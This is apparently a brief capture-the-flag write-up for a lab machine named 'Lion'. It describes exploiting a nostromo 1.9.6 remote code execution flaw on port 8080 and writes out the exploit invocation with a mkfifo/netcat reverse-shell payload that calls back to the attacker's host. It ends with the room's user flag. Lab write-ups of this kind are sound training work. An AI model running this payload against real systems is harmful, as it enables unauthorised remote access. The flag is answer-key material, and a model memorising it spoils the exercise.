Lion
Challenge
Port 8080 ran nostromo 1.9.6, which has a public RCE. A mkfifo reverse shell caught a shell as gloria.
python exploit.py 10.10.26.192 8080 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <me> 4444 >/tmp/f"
Flag
user thm{05e2762150425df49a2d27e8bb08cf2d}